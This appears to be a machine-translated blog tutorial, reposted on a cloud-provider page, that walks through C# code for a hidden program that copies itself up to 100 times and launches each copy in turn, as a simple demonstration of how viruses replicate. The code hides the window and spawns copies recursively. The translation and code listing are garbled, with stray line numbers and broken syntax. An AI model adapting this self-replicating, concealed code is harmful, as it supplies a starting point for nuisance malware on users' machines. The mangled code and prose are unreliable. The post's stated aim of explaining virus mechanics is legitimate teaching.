Simple implementation of self-replication of virus and Rogue Software (C #)

Source: Internet
Author: User
Tags copy empty implement root directory

Recently, a friend of the computer virus, let me run three times, the cost of Dickens, several anti-virus software is still not able to remove all the virus, and finally there is no way, can only copy out the data, the hard disk repartition system, installed on the free use of the AntiVir, the world finally quiet.

Not only because of the fragility of the Windows system, but also because the virus is endless self-replicating and full of hard to hide, making our fragile nerves overwhelmed, the face of riddled with holes, with inexplicable and strange name folders and files of the system, I believe most people will choose to reload the system. Viruses and rogue software always make people angry! So how does a computer program replicate itself? Actually it's very simple. I will use C # to simply implement a small malicious program that can replicate itself.

Program to implement the following functions.

First, the runtime does not appear to run the interface, of course, in the Task Manager, you can still see the process, the depth of the virus is no trace can be found.

Second, the program copies n copies of itself under the running directory.

Third, the recursive replication method, that is, the first program to generate a second program, the second program to generate a third program, and so on.

The source code is very simple, the following to analyze:

35//not shown on taskbar
this. ShowInTaskbar = false;
37//form Transparent
this. Opacity = 0;

The System.Windows.Forms.Form class encapsulates most of the features of Windows Windows programs, greatly simplifying the design process of Windows interfaces, which are used to hide the running state of our programs, the first ShowInTaskbar property, and when set to No, the program will not be on the status bar Face display. The second Opacity property, which represents the opacity of the window, takes a value between 0 and 100. 0% opacity is 100% transparent. This way, when the program is running, you can't see the form.

44//Default number of copies
The const int total = 100;
_count int = total;
47//Running program path and file name
A string _file = Application.executablepath;
49//Running program path
string _path = Application.startuppath;
51//Running program file name
string _name = _file. Replace (String. Format ("{0}\\", _path), String. Empty). ToLower ();
Try
54 {
_count = Int. Parse (_name. Replace (". exe", String. Empty));
_count--;
57}
The catch
59 {
60}
Finally
62 {
63}
64//target file
A string _target = string. Format ("{0}\\{1}.exe", _path, _count.) ToString ("000"));

The

Application class provides a strange way to get a file name property that gets a program to run an absolute path and includes a property that runs an absolute path to the program and does not directly provide a file name. The normal method of intercepting filename should be judged according to "\", here adopts the method of substitution, we can think about how to realize it with substring. 55 and 56 lines, if the filename is not a number, then starting from 100.exe, if you execute the 10000.exe file, so bad, you may need to log off the current user to terminate the program, of course, let it run will not have much impact. Finally, 65 lines, we lock the target in the current directory of the program. Viruses and rogue software are less polite, and often it may choose a disk root directory, C:\WINODWS, C:\Windows\System32, or other important system directories. And the virus uses the random naming method or imitates the system file name the fixed naming way, achieves hides itself and confuses the user the goal.

67 if ((File.exists (_file)) && (_count > 0)
, {
69//Copy
-FileStream _fi Lestream = File.Open (_file, FileMode.Open, FileAccess.Read, fileshare.readwrite);
byte[] _buffer = new Byte[_filestream.length];
_filestream.read (_buffer, 0, _buffer). Length);
_filestream.close ();
74//If the target already exists, delete
File.exists (_target)
File.delete (_target);
$
79//paste
FileStream _writer = File.Open (_target, FileMode.OpenOrCreate, FileAccess.ReadWrite, FILESHARE.N one);
Bayi _writer. Write (_buffer, 0, _buffer. Length);
_writer. Close ();
83//Run just copy completed program
System.Diagnostics.Process.Start (New System.Diagnostics.ProcessStartInfo (_target));

Application.exit ();

Finally, we're going to finish the third goal, replicate ourselves and run the replicated new programs. Before we get the _file program to run the absolute path and include the filename, so we can open it and read it. File is a static method of document operation, it is only responsible for open, close, create and delete files, read and write to the file, it will be FileStream to operate. This is just the entire copy file, very simple. The nature of the virus can be attached to other programs or files, the whole process is more complex. First, you need to know a lot about the structure of the executable, decompose the original executable file and decompose itself, then regroup into a new executable, but the order of execution has changed, the program will first jump to the virus code to ensure that the virus can be executed, then jump back to normal program code, So that the virus can be executed in a hidden state. 84 lines Call a new copy-completed program. To enable the newly copied program to run automatically and make the next replication. In the same way, a lot of software now provides automatic updates, it's basically the same way, download the upgrade package, the main program calls the upgrade program, if necessary, the main program will quit, upgrade the program to complete the main program or other files of the replication update, and then call the main program again. This shows that the function of the computer is not good or bad points. The principle that the virus can be used, the common procedure can certainly also use. It is the truth that the water can carry a boat and overturn it. I very much hope that you provide me with criticism and suggestions, you can send mail to my mailbox Anature@163.com.



Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.